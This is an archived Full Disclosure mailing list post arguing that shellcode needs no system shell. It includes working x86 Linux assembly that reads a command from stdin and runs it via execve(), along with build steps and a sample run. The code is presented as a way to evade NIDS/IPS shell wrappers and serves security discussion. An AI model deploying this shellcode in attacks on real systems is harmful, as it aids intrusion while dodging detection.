Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: No shell => secure?
From: Martin Fallon <mar_fallon () yahoo com br>
Date: Fri, 9 Jul 2004 16:01:46 -0300 (ART)

Hello Srs.!

We don't need a shell. One shellcode use system calls
and the shellcode can be the shell. 

See the follow code:

-------------- noshell.s --------------
#Exemplo de assembly que simula shell.
#Sem utilizar nenhuma shell, ele é a shell.:)
#Nash Leon - nashleon () yahoo com br
#
#Obs: tah pegando apenas filename com 7 bytes.

_start:

#read(0,buffer,20)
xorl %ebx, %ebx
movl $3, %eax
leal -20(%esp),%ecx
movl $20, %edx
int $0x80


#execve(buffer)
pushl %ecx
popl   %esi
movl   %esi,0x8(%esi) 
movb   $0x0,0x7(%esi)
movl   $0x0,0xc(%esi)  
movl   $0xb,%eax
movl   %esi,%ebx 
leal   0x8(%esi),%ecx
#leal   0xc(%esi),%edx 
movl $0x0, %edx
int    $0x80                


#exit()
movl $0x1, %eax
xorl %ebx, %ebx
int $0x80
---------------------------------------

This source use read() and execve() to
execute one command from stdin. This sample is
only to demonstrate that is possible create
one shellcode that execute commands without
use one shell(/bin/bash,sh,zsh,tcsh, etc).

It is util when one NIDS/IPS interact with
one shell wrapper, waiting one string in the
interface, capturing an attack.

In this sample is permitted only
7 bytes as path filename to execute:

$ as -o noshell.o noshell.s
$ ld -o noshell noshell.s
ld: warning: cannot find entry symbol _start;
defaulting to 
0000000008048074

$ /noshell
/bin/ls
noshell  noshell.o  noshell.s

So, Mrs. One shell is not necessary to exploit
one system. NIDs/IPS can use wrapper in the system
call execve() to security, but still is possible
break this resource.

Sorry ny poor english.

Best Regard,

Martin Fallon.
Clube dos Mercenarios
http://cdm.frontthescene.com.br/








        
        
                
_______________________________________________________
Yahoo! Mail agora com 100MB, anti-spam e antivírus grátis!
http://br.info.mail.yahoo.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]